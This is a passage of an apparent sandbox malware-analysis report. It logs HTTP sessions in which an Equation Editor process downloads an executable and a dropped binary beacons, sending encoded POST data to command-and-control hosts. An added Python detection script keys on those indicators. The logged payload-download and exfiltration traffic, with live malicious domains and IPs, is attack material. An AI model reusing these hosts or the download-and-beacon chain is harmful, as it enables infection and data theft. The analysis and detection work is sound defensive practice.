User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: timurtrading.my
Connection: Keep-Alive
Oct 22, 2024 15:00:46.517280102 CEST | 369 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 22 Oct 2024 13:00:46 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://timurtrading.my/kontempt2.1.exe
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 167.172.133.32 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 15:01:33.686908007 CEST | 420 | OUT | GET /8pmv/?DtMH=kxoTeT1hyx&2PV85pl=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Connection: close
Host: www.omnibizlux.biz
User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Oct 22, 2024 15:01:34.725764990 CEST | 303 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Tue, 22 Oct 2024 13:01:34 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Oct 22, 2024 15:01:34.726486921 CEST | 303 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Tue, 22 Oct 2024 13:01:34 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
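
The two sessions above carry the network-side indicators a detection engineer would key on: an Equation Editor process (PID 3448, EQNEDT32.EXE) issuing an HTTP GET for an .exe with an Internet Explorer User-Agent, and a binary dropped into a 78-character random-letter directory under Program Files (x86) beaconing to www.omnibizlux.biz with an Opera-for-Android User-Agent from a Windows host. The scanner below is an added example and not part of the Joe Sandbox report or of any Joe Security tooling; it applies those four heuristics to constructed JSON-lines egress events. The event shape, the field names, the process allow and deny sets, the random-directory threshold and the benign chrome.exe record are all assumptions made for the illustration.

```python
"""Heuristics for Office-exploit download chains over HTTP egress telemetry.

Added example, not part of the Joe Sandbox report. The JSON-lines event format,
field names, process sets and the benign record below are assumptions.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Processes that have no business issuing HTTP requests. The Equation Editor
# entry is the one the report shows making a GET (PID 3448). Assumed list.
NO_NETWORK_PROCESSES = {"eqnedt32.exe", "winword.exe", "excel.exe", "msinfo32.exe"}

# Processes whose User-Agent is expected to describe a browser. Assumed list.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "opera.exe"}

# Platform tokens that a Windows host process should never send; report
# session 1 uses "Opera/9.80 (Android 4.0.4; Linux; ...)".
FOREIGN_PLATFORM_TOKENS = ("Android", "iPhone", "Linux;", "Macintosh")

# A path component of 20+ letters only, in mixed case, between backslashes,
# e.g. "glkSBODVJdy...LTQvX" in report session 1. Heuristic; tune per fleet.
RANDOM_DIR = re.compile(r"\\(?=[A-Za-z]*[a-z])(?=[A-Za-z]*[A-Z])[A-Za-z]{20,}\\")

# Request path ending in a PE-ish extension, as in "GET /kontempt2.1.exe".
PE_DOWNLOAD = re.compile(r"\.(exe|dll|scr|msi)(\?|$)", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def process_name(image_path: str) -> str:
    """Last path component, lower-cased, so set lookups are case-insensitive."""
    return image_path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[Alert]:
    """Apply each heuristic to one egress event and return every alert it raises."""
    alerts: list[Alert] = []
    name, pid = process_name(ev["image"]), ev["pid"]
    ua, uri = ev.get("user_agent", ""), ev.get("uri", "")

    if name in NO_NETWORK_PROCESSES:
        alerts.append(Alert("office_helper_http", pid, f"{name} -> {ev['host']}{uri}"))
    if name not in BROWSERS and any(tok in ua for tok in FOREIGN_PLATFORM_TOKENS):
        alerts.append(Alert("spoofed_platform_ua", pid, ua))
    if RANDOM_DIR.search(ev["image"]):
        alerts.append(Alert("random_dir_binary", pid, ev["image"]))
    if name not in BROWSERS and PE_DOWNLOAD.search(uri):
        alerts.append(Alert("pe_download_non_browser", pid, f"GET {ev['host']}{uri}"))
    return alerts


def scan(jsonl: str) -> list[Alert]:
    """Run check_event over a JSON-lines feed, skipping blank lines."""
    alerts: list[Alert] = []
    for line in jsonl.splitlines():
        if line.strip():
            alerts.extend(check_event(json.loads(line)))
    return alerts


# Constructed events modelled on report sessions 0 and 1, plus one benign
# browser request that must not alert. Not taken from any real telemetry feed.
SAMPLE_EVENTS = r"""
{"pid": 3448, "image": "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "host": "timurtrading.my", "uri": "/kontempt2.1.exe", "user_agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)"}
{"pid": 1696, "image": "C:\\Program Files (x86)\\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\\uAjPOONiWk.exe", "host": "www.omnibizlux.biz", "uri": "/8pmv/?DtMH=kxoTeT1hyx", "user_agent": "Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10"}
{"pid": 4120, "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "host": "www.example.com", "uri": "/index.html", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0 Safari/537.36"}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
```

The first rule is the cheapest and the highest-signal one: EQNEDT32.EXE has no legitimate reason to open a socket, so any HTTP request from it is worth an alert regardless of destination. The User-Agent and random-directory rules are heuristics and will need tuning against your own fleet before they run unsupervised.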


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49164 | 45.33.6.223 | 80 | 3676 | C:\Windows\SysWOW64\msinfo32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 15:01:38.834542036 CEST | 232 | OUT | GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1
User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Host: www.sqlite.org
Connection: Keep-Alive
Cache-Control: no-cache
Oct 22, 2024 15:01:39.430274010 CEST | 1236 | IN | HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 22 Oct 2024 13:01:39 GMT
Last-Modified: Sat, 12 Mar 2022 13:56:34 GMT
Cache-Control: max-age=120
ETag: "m622ca692s8a577"
Content-type: application/zip; charset=utf-8
Content-length: 566647
                                                                          Data Raw: 50 4b 03 04 14 00 00 00 08 00 a6 12 57 54 f6 08 b2 ad 9e 06 00 00 c6 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a8 37 15 62 a8 37 15 62 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 c9 b2 dd 26 10 40 f7 fe 1b fb a5 5c f9 01 af 93 4a b2 c8 4e 85 24 24 e1 8b 40 66 b8 83 bf 3e cd 70 45 37 20 67 f5 1e a7 2f d0 b4 7a 82 6f ff fe f9 c7 5f ff fc fd c9 fe 90 c2 f1 8f 81 ad ab e1 2b 73 7c 98 b4 72 fc e9 ba 12 af 10 f7 4e 0f f0 43 ae ac d0 8a e0 3b 9b bc df 87 83 ad dc 9e 82 91 4d 37 7f 0c 8b 50 c2 6e 35 05 e8 6a 16 a6 d3 2d b3 c0 f0 9d c1 04 b5 d6 02 eb f8 51 98 50 f3 30 4a 3d b6 e4 eb 6f 94 cd da 8f 92 53 26 f0 be 19 d4 f3 94 97 92 92 83 19 b6 73 c7 4d 65 ac 4a 08 23 fe bc 12 2a f8 5b c9 34 6c ce 0d 85 e4 23 9d e4 f3 d7 96 d5 6a df 99 f4 d5 0e 3f b9 d1 ad ad de 14 2f 00 c3 61 7c 39 fc 61 03 9a a4 b6 9c 22 7d 70 45 89 e1 6c ae 49 fb ab 87 81 ff 0b f2 f6 35 6c 4c cd 12 1b 20 40 27 76 ae 7d b1 c1 c4 d4 c4 e5 85 5f 4e b0 c4 ca 57 a3 c1 4d d8 3c 5f 60 f0 20 b3 f7 64 33 97 bc 28 85 [TRUNCATED]
                                                                          Data Ascii: PKWTsqlite3.defUT7b7bux&@\JN$$@f>pE7 g/zo_+s|rNC;M7Pn5j-QP0J=oS&sMeJ#*[4l#j?/a|9a"}pElI5lL @'v}_NWM<_` d3(%?z;n4$p7Q_%!L]ISg>'Hn4JsY/5s-;n-tB$}998BAdBNg>_PoFbv>}$3{;3hJTjaOfU' Q;+(,c-'7!!'GXxKi?pv<J-b09jd+$[@wjzy[dohhhU8c!(=;/4#Nl"=jF@vPw2U);AV%wkC$/"(3`8A0}dkni6nPdLz&}_zY,r{'48t/Au?jy^9cOhI`z(A b8iLM'ZCVJ$~&Ca?;jC1Hn}[KI)9d66F?DR(&Q2;w&!:}A$5=da^K[lCDd<#${
                                                                           Oct 22, 2024 15:01:39.430650949 CEST | 1236 | IN | Data Raw: 90 c6 3f 0c 50 2c 86 21 ce 98 da 82 1e 33 1e 92 0b 63 70 a1 68 e4 26 97 1e 86 c3 c5 8a d7 63 b4 d5 49 f0 7e 08 7e d4 b0 f3 bb ea 57 fe 98 43 7e 0f 5d 14 bd cb 14 19 75 c5 c2 67 7e b8 ad c3 49 95 2e 18 35 b9 88 a2 7e 16 a8 0e b1 8c c7 70 9d b7 b6
                                                                          Data Ascii: ?P,!3cph&cI~~WC~]ug~I.5~pR] N"[;XjJ/So)/J8st?RK\PeZ0H 8}zDu<p/[P:y~P>mXNdJe/B4j%l`gHL,UM
                                                                           Oct 22, 2024 15:01:39.430664062 CEST | 1236 | IN | Data Raw: 28 34 0f be 67 c1 ef bc 9b e0 9c 0f 3c 57 52 82 cf 49 66 f8 f3 ae e5 96 75 f3 21 be 17 34 7c ac 8f a0 af 0c 73 b1 12 e3 e1 9d 86 14 e7 03 2f e9 e5 e2 27 e8 4b c3 44 f8 fd f0 26 b8 da 07 5c 4b 97 e1 33 a2 31 f4 5a d8 d8 19 6a 6e 01 27 be cc ea 97
                                                                          Data Ascii: (4g<WRIfu!4|s/'KD&\K31Zjn'R&hpndw(3;w{n?@60t.;VwF8gwkp5;s!s6n.a#>{~Gjwvh{'xF87O_|Z<x8
                                                                           Oct 22, 2024 15:01:39.431730032 CEST | 1236 | IN | Data Raw: 86 3a 2d ef e3 b3 3a 03 7a 65 2a 5d 68 a9 6c 11 27 3a 9a 45 9e 1c 50 2f c3 47 92 69 29 6c 78 af 4a 9b 4f b0 aa 4d 85 c1 2e 48 f8 f1 0d 09 f0 4c dd e6 42 ea 1c 08 3d ca b5 51 72 d7 40 83 ef b1 c4 6c 9c e2 93 c6 3a 7c ea 8b 90 12 ea 73 00 05 24 51
                                                                          Data Ascii: :-:ze*]hl':EP/Gi)lxJOM.HLB=Qr@l:|s$Q_IoN!^{Cbs\{-+r1+RWfhXwT^koc2yNK-+[]#9Y>3@BMM/IK1LIt|#o6N>B+<Bjs]qZO_$fLy;
                                                                           Oct 22, 2024 15:01:39.431746006 CEST | 1236 | IN | Data Raw: 06 fb 1b 51 1a ab ca 6d 97 a6 43 93 ea d4 c9 3b 22 a0 c6 50 56 f4 21 f2 60 e0 63 e4 d3 72 7b 20 6b 04 60 8e 2d ec c1 92 06 b1 a4 99 db 2f 31 44 90 21 b2 ee 52 14 e4 89 be 0c 05 fd 48 2b 08 92 26 46 8f 68 b8 a5 db b5 32 59 86 de 3a 35 16 90 03 f8
                                                                          Data Ascii: QmC;"PV!`cr{ k`-/1D!RH+&Fh2Y:5VN=<hLbPc;g>DsGu<0l!z=K#qm\(}8n8s> l>wH]8v9,08[#RWThTN:D:`
                                                                           Oct 22, 2024 15:01:39.433033943 CEST | 1236 | IN | Data Raw: 25 13 79 15 7a 3b 01 75 4c a4 24 51 85 57 1e 92 2b fb e0 75 4d 82 1a 53 d9 49 66 48 7c 63 c6 1d 46 df 79 a3 f8 10 9d d4 e4 64 87 58 95 6d 24 2f 01 60 32 13 d5 09 be 4d 09 06 92 c1 8b 08 c6 c9 9b cc b0 26 a5 e8 3e 67 bc 19 90 67 98 91 64 d2 3c 8b
                                                                          Data Ascii: %yz;uL$QW+uMSIfH|cFydXm$/`2M&>ggd<osAC#(j\F>`B~S(=5\Hs #fGl E\70~,4`:<1Mt4ci,Opb7K@=acr b/#8-tJ04
                                                                           Oct 22, 2024 15:01:39.433048010 CEST | 1236 | IN | Data Raw: 71 84 8b e8 c7 d8 d3 f4 53 36 0c bd 26 77 17 19 9a e2 e9 c6 19 88 b3 51 ae 0d a2 28 ae f3 9d 0b ff 1a 63 c0 39 a8 4e 4c 93 df 45 f1 27 92 b0 5f 9a 7b 8c 70 a8 e0 4d d7 26 26 ec 89 17 cb 66 e0 cc 94 a6 d0 2a ac 1c ea d8 7c 9b a0 29 a6 aa 3c 5e a8
                                                                          Data Ascii: qS6&wQ(c9NLE'_{pM&&f*|)<^qa6L7_18N*,b)-;Ostb4q#fVsA!o*gP*z^K4otj_3}}UOcS"{)jdvHLGSKWe({)
                                                                           Oct 22, 2024 15:01:39.434348106 CEST | 1236 | IN | Data Raw: 4b 8a 2b 5b 24 60 25 6a 50 41 a7 61 a3 71 30 fa c4 4c 6c 55 e4 f0 91 6f c4 69 fe d4 5d 7e 4b 15 9d 45 27 39 8e 6e 34 93 69 64 06 19 54 bb 47 07 94 b1 46 09 63 8f 89 a8 d5 60 ba 7e dc c1 ad a7 dd e6 8e 88 b9 55 3d 45 67 03 25 0f 77 44 a4 c0 53 47
                                                                          Data Ascii: K+[$`%jPAaq0LlUoi]~KE'9n4idTGFc`~U=Eg%wDSGd:#=RL;^~*FnWqg<P4O&_g(/]Bf|zsm5t}lt}O``pC<mb~fcf)\fN4
                                                                           Oct 22, 2024 15:01:39.434360981 CEST | 1236 | IN | Data Raw: 97 31 71 ad 98 54 4c 73 ee 84 cd 90 d4 17 cb 83 4f 94 3f 8c ba 8e be ba 04 ec ba b7 ea 8f 76 1d 3d af 09 a3 6a bc 3c f4 c4 ee 27 90 8e 3d 75 60 3c cc f9 a3 9a 09 0f 0c 47 6c 9f 33 c2 8a 4b cb a2 5e 0e a5 25 d0 3c be bf de 60 e5 0d e2 d4 ed e7 d1
                                                                          Data Ascii: 1qTLsO?v=j<'=u`<Gl3K^%<`YD=5.sxwHo0;3m7XT3P6QN:4wypk[N;fx'k+.QLZA]'\sw)=)aO)/*UtUI#/NS}cm
                                                                           Oct 22, 2024 15:01:39.434371948 CEST | 709 | IN | Data Raw: 4f e1 83 56 5f dd 6a 25 10 71 96 1d ff 6a e4 b1 98 e6 4d 84 1d b5 d1 28 c6 51 83 6f 9e 41 34 39 d5 01 df 79 5e 8c 74 c2 9b 3a e0 0c 37 cf 93 0f 06 41 66 81 e5 93 45 73 6c e4 84 7f 45 90 9c a9 bb c4 9b d6 5b 2b 3b cb 52 c8 d6 44 1e 38 22 98 1f 9b
                                                                          Data Ascii: OV_j%qjM(QoA49y^t:7AfEslE[+;RD8"YYSDd9-=rU|%i_1f<_YZza{JaYGf=k\6KNW*WK=ZGn<;b5hW3u]F{}*3eH#HT9pxN8R "]
                                                                           Oct 22, 2024 15:01:39.436089993 CEST | 1236 | IN | Data Raw: 67 86 fa db 9b 0d d4 76 19 f5 93 01 bc 95 a0 94 1c 09 b2 f3 98 06 e5 1d 78 7a 2f ef dd 9e 22 7f 5e f0 bd 65 68 cb 74 dc 6f 79 03 96 cc 3d 50 59 39 c0 53 af d9 b1 89 87 bd 89 df 41 bd dd e4 61 04 65 4b 8b 44 a9 11 0b d5 e3 f6 3e 3c 50 db 72 04 29
                                                                          Data Ascii: gvxz/"^ehtoy=PY9SAaeKD><Pr)Qmxx2sd5"0nAy5F{&U6@c"#Bw</2Qc'd&}-a]_0j-%L<Ur_[x\U_#MQ(7Vn


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           3 | 192.168.2.22 | 49165 | 185.196.10.234 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:01:50.077229977 CEST | 2472 | OUT | POST /quvp/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 2164
                                                                          Host: www.75e296qdx.top
                                                                          Origin: http://www.75e296qdx.top
                                                                          Referer: http://www.75e296qdx.top/quvp/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 57 58 6d 37 41 38 4a 69 66 77 39 31 4f 30 30 64 66 7a 77 6f 38 6d 6c 71 68 50 6e 73 4d 53 43 64 48 2b 50 38 64 43 54 37 54 43 37 6f 55 57 30 47 39 63 66 2f 4f 6c 59 4d 6d 58 37 61 4e 44 76 4e 53 34 4a 68 7a 49 6e 6d 46 72 69 46 68 4d 6c 55 35 61 6d 37 33 2f 52 62 56 5a 50 66 41 51 30 32 61 66 50 35 4c 30 52 62 68 6f 65 64 56 69 37 68 59 66 2f 42 78 64 55 34 48 2b 61 6f 75 33 75 56 34 6f 66 58 71 55 70 55 30 68 51 62 64 68 4a 79 73 31 43 5a 75 36 54 78 30 47 66 30 54 77 31 4f 4f 42 42 6a 6c 5a 38 64 36 54 31 6c 61 6f 78 4e 2b 62 62 65 50 4c 34 4f 4b 6f 39 59 75 63 30 32 5a 58 4a 67 6a 35 75 79 45 4a 64 7a 41 37 6b 31 33 47 73 73 75 77 78 38 48 47 6c 6d 4a 78 4e 79 55 43 51 77 59 41 78 4e 6c 6f 42 33 78 59 6a 2b 31 4c 4a 6d 37 66 78 76 6d 63 2b 49 32 57 44 4c 62 71 4d 71 78 41 4f 42 77 41 2f 48 6a 4c 35 63 6a 78 31 64 39 7a 56 51 71 50 41 63 34 76 41 7a 63 51 57 65 2b 68 78 75 61 63 70 53 62 30 79 4e 43 72 34 75 55 36 71 72 38 53 65 61 6d [TRUNCATED]
                                                                           Data Ascii: 2PV85pl= [TRUNCATED]
                                                                           Oct 22, 2024 15:01:50.082779884 CEST | 166 | OUT | Data Raw: 76 43 46 64 78 71 55 35 41 53 54 48 79 59 59 52 34 36 2f 52 48 36 70 61 5a 65 6c 4c 56 76 46 37 2b 4c 67 6a 32 54 41 77 2f 30 4a 56 4b 74 51 48 75 61 34 4a 62 31 6a 7a 50 4c 39 46 65 31 36 4f 4c 2b 48 5a 4b 52 5a 55 46 4e 2b 6f 64 46 4d 6a 4d 46
                                                                          Data Ascii: vCFdxqU5ASTHyYYR46/RH6paZelLVvF7+Lgj2TAw/0JVKtQHua4Jb1jzPL9Fe16OL+HZKRZUFN+odFMjMFZ0tCVF9LxYDxnJxgC+8WI06Oi5F590126ILpdC9M/oey/6UjezPBgQg+I6JzZQkUevQ3OeFuZDVdPsr1g1zb
                                                                           Oct 22, 2024 15:01:51.069818020 CEST | 325 | IN | HTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:50 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
                                                                           Oct 22, 2024 15:01:51.445035934 CEST | 325 | IN | HTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:50 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           4 | 192.168.2.22 | 49166 | 185.196.10.234 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:01:52.618303061 CEST | 677 | OUT | POST /quvp/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 204
                                                                          Host: www.75e296qdx.top
                                                                          Origin: http://www.75e296qdx.top
                                                                          Referer: http://www.75e296qdx.top/quvp/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Data Raw: 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 58 58 6d 36 56 49 4a 69 2f 77 39 67 4f 30 30 45 50 7a 4d 6f 38 69 58 71 6b 33 4e 74 2f 43 43 64 57 4f 50 38 76 61 54 33 7a 43 38 38 6b 57 6f 4d 64 64 66 2f 4f 6b 33 4d 6c 50 37 61 4e 58 76 4d 77 77 4a 6a 79 49 67 70 56 72 6b 52 52 4d 6d 55 35 65 56 37 33 44 37 62 57 5a 50 66 42 63 30 33 61 50 50 2f 74 59 52 65 52 70 56 4e 56 69 73 68 59 53 6c 42 77 74 4d 34 43 69 61 6f 66 72 75 57 70 49 66 53 35 38 70 44 6b 68 52 45 39 67 41 79 76 59 64 65 66 6d 74 37 33 4f 62 37 68 6f 58 45 70 39 6a 75 6c 6c 73 57 61 76 55 73 76 49 75 59 2f 32 46 43 51 3d 3d
                                                                          Data Ascii: 2PV85pl=UUdA9WufenFARXXm6VIJi/w9gO00EPzMo8iXqk3Nt/CCdWOP8vaT3zC88kWoMddf/Ok3MlP7aNXvMwwJjyIgpVrkRRMmU5eV73D7bWZPfBc03aPP/tYReRpVNVishYSlBwtM4CiaofruWpIfS58pDkhRE9gAyvYdefmt73Ob7hoXEp9jullsWavUsvIuY/2FCQ==
                                                                           Oct 22, 2024 15:01:53.641880035 CEST | 325 | IN | HTTP/1.1 404 Not Found
                                                                          server: openresty
                                                                          date: Tue, 22 Oct 2024 13:01:53 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          x-powered-by: PHP/7.2.30
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           5 | 192.168.2.22 | 49167 | 185.196.10.234 | 80 | 1696 | C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           Oct 22, 2024 15:01:55.163276911 CEST | 2472 | OUT | POST /quvp/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 3628
                                                                          Host: www.75e296qdx.top
                                                                          Origin: http://www.75e296qdx.top
                                                                          Referer: http://www.75e296qdx.top/quvp/
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
